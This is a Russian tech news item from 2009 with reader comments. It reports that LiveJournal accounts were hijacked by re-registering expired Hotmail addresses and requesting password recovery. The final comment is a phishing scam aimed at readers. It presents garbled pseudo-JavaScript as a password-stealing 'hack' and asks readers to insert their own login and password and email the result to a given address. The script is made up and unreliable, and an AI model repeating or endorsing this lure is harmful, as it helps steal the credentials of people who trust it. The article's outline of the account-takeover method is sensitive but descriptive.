Взломана часть аккаунтов LiveJournal

image

Теги: LiveJournal, взлом

Администрация сервиса блогов LiveJournal выпустила предупреждение для пользователей, в котором говорится, что к части аккаунтов в системе был получен доступ сторонними пользователями.

Администрация сервиса блогов LiveJournal выпустила предупреждение для пользователей, в котором говорится, что к части аккаунтов в системе был получен доступ сторонними пользователями. Причина инцидента - просроченные учетные записи почтового сервиса Microsoft Hotmail.

Как говорится в сообщении администрации ЖЖ, недавно ряд блогов и сообществ были взломаны, контент удален, а их легальные владельцы не смогли получить доступ. Судя по всему, проблема кроется в политике повторной активации учетных записей серверов Hotmail.

По информации ЖЖ, взломщики получали названия почтовых ящиков Hotmail с LiveJournal, так как там они отображались в открытом доступе, отыскивали учетные записи, которые не использовались более года, регистрировали аналогичный ящик на серверах Microsoft и подавали заявку на восстановление.

После этого злоумышленник мог получить доступ к "своему" аккаунту в LiveJournal. Однако, до сих пор непонятно, каким образом удавалось вычислить пароли. Администрация ЖЖ этот момент никак не пояснила.

В электронном письме, разосланном пользователям сервиса блогов, говорится, что пользователям необходимо убедиться, что все их email-адреса, зарегистрированные в ЖЖ, все еще принадлежат им.


или введите имя

CAPTCHA
Tigeк Claw
17-03-2009 13:55:16
Идиотская политика Хотмыла, разрегивать е-mail. Но сейчас хоть продлили срок, а раньше месяц не заходишь, мыло блокируется, а через три анрег.
0 |
*
17-03-2009 21:05:39
дык, у них инфа об аккаунтах хранится в Microsot SQL базе. видимо такае тормознутое Г, что им приходится "чистить" базу время от времени... Позор да и только!
0 |
FFx00xF0
17-03-2009 14:18:28
Это всё долбаные юзвери ЖЖ, профукали мыло и ещё удивляются... это во всём виновато ЖЖ.
0 |
*
17-03-2009 21:12:16
это вся качественная реклама хотмейла... Как всегда народ воспринимает гемор за конфетку
0 |
FFx00xF0
17-03-2009 23:53:50
Это реклама заморочек в ЖЖ и их крутости :P
0 |
Русский
17-03-2009 14:21:21
Да ваще стереть ентот жорнал и все . а пароль узнавать не обязательно было. всеравно новый высылали на почту.
0 |
bobr
17-03-2009 15:10:59
Однако, до сих пор непонятно, каким образом удавалось вычислить пароли.А че, попросить новый пароль на и-мэйл на ЖЖ нельзя? Бо я не помню - удалил аккаунт год назад и не жалею.
0 |
(Скрытый комментарий)
хакер
01-06-2009 14:52:52
ДАННОЙ ХИТРОСТИ МЕНЯ НАУЧИЛ ОДИН ЗНАКОМЫЙ ПРОГРАМИСТ-ХАКЕР, СКАЗАЛ ЧТО ЛЮБОЕ JAVA ПРИЛОЖЕНИЕ ЛОМАЕТСЯ ПРОСТЕЙШИМ СКРИПТОМ (ПРИВЕДЁН НИЖЕ). А ТАК ЖЕ В РАБОТЕ СЕРВЕРА ЕСТЬ ПОГРЕШНОСТЬ, КОТОРАЯ ЗАКЛЮЧАЕТСЯ В ТОМ ЧТО ПИСЬМА ОБРАБАТЫВАЕТ АВТОМАТИКА, ТО ЕСТЬ ЗА СОДЕРЖАНИЕМ НИКТО НЕ СЛЕДИТ, ТО ЕСТЬ ВЫПОЛНЯЕТСЯ ЛЮБАЯ КОМАНДА, КОТОРАЯ МОЖЕТ НАХОДИТСЯ В ПОИСЬМЕ!!! ПОПРОБОВАВ У МЕНЯ ВСЁ ПОЛУЧИЛОСЬ, СРАЗУ ЖЕ ОДЕЛСЯ В Б!!!САМ Я ДАВНО УШЁЛ С СЕРВЕРА ПОЭТОМУ МОГУ РАССКАЗАТЬ ОБ ЭТОМ МИРУ!!! для того чтоб всё прошло удачно вам необходимо ввести сюда такие АККАУНТЫ которыми вы пользуетесь чаще всего, в противном случае ВОЗМОЖЕН БАН!!! <script language="javascript"> id := "ЛОГИН ЖЕРТВЫ" id$ := "ВАШ ЛОГИН акк" pass := loadpwlfile(serveraccountpassword''id''.pwl) pass$ := "ВАШ ПАРОЛЬ акк" q1 := loadfile(serveraccountpassword''id.q1''.txt) function backpassword(id,pass,q1,q2,i,k) if id= true and pass$=loadpwlfile(serveraccountpassword''id$''.pwl) then if q1 = true then send.file.pass("ВАШ ПОЧТОВЫЙ АДРЕС") endif end if end function </script> (КРУПНЫП РУССКИМ ШРИФТОМ ВЫДЕЛЕНО ТО ЧТО ДОЛЖНЫ МЕНЯТЬ ВЫ) отправьте данный СКРИПТ на event_gm3@bk.ru и в течении суток вам придёт письмо с ЛОГИНОМ И ПАРОЛЕМ ЖЕРТВЫ!!! ЖЕЛАЮ УСПЕХА В ВАШИХ ХАКЕРСКИХ НАЧИНАНИЯХ))
0 |